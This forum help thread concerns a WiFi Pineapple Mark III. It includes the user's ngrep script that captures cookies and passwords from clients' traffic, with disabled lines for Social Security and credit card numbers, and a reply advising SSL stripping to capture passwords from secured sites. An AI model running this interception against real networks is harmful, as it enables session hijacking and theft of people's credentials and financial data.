Jump to content

Mk3 Help With Ngrep And Karma


Recommended Posts

please help me for some of the cases that occurred for my MK3:

The first case, ngrep. I've enabled cookies and passwords feature but results from ngrep.log not appear in the pineapple ControlCenter I want to know how to bring it in pineapple control center.

but when I check via ssh to 172.16.42.1 cookie file exists in temporary folder (ngrep.log). is there a solution to display results to the control center ? (attach file)

cookie info

snapshot15.png

pineapple control center

snapshot13.png

my ngrep config

#!/bin/sh
# Capture Cookies
ngrep -q -d eth0 -W byline -i 'Cookie:' dst host not 172.16.42.1 >> /tmp/ngrep.log
##ngrep -q -d eth0 -Wbyline -O /tmp/ngrep.pcap -i 'cookie:' tcp and port 80 and dst host not 172.16.42.1 >> /tmp/ngrep.log


# Capture Social Security Numbers
##ngrep -q -d eth0 -W single -w '[0-9]{3}\-[0-9]{2}\-[0-9]{4}' dst host not 172.16.42.1 >> /tmp/ngrep.log

# Capture Credit Card Numbers
# #ngrep -q -d eth0 -W single '[0-9]{4}\-[0-9]{4}\-[0-9]{4}\-[0-9]{4}' dst host not 172.16.42.1 >> /tmp/ngrep.log

# Capture Passwords
ngrep -q -d eth0 -W single -i 'password' dst host not 172.16.42.1 >> /tmp/ngrep.log

second case, karma.log when I turn on my mark III for about 15 minutes and I saw that in the file / tmp karma.log increase in size very quickly. if i can use or activate logrotate karma.log crontab to remove them? (attach file)

using disk partition

snapshot8.png

increse

snapshot9.png

please help me :( :( :(

Thanks

Link to comment
Share on other sites

I actually thought I had a problem with the association log when I first got the MK3 using firefox. I found that if I use chrome I don't have any problems in the interface however I still cant see some of the fields when I use Firefox, not sure why but I would try switching browsers first, its not hard and easy to check.

Link to comment
Share on other sites

Thank you for the reply itsm0ld,

but still no luck, i already tried using chrome still no cookies shown at pineapple control center.

chrome

snapshot18.png

ngrep conf

snapshot17.png

my pineapple control center

snapshot16.png

i noticed your trying to capture passwords.. where are you trying to capture from ? if the site is SSL secured, you need to ip/port forward and make sure you have SSL strip running

Edited by allisonmagic
Link to comment
Share on other sites

1. http://wifipineapple.com/doku.php <-- read changelog here

2. yes

3. yes

hi there, thank you for the solution but before i'm flashing to 1.9 i want to ask few things:

1. what's differents beetween 1.0.2 and 1.9 ?

2. is it OK to flash the unit to 1.9 that i bought from hak5 ?

3. if i want to flash it to 1.9 via gui i must start from here right ? sorry for my noobs questions :)

snapshot21.png

Link to comment
Share on other sites

woww.. Thank you very much diggler for fast response....

for number 1. i meant, why there 2 version available 1.0.2 and 1.9 ?

now i'm confident to flash the router... :) :) :) :) thanks

1.0.2 is the source version. The 1.9 is the compiled firmware which is easy to flash and updated by Sebkinne with fixes and features.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...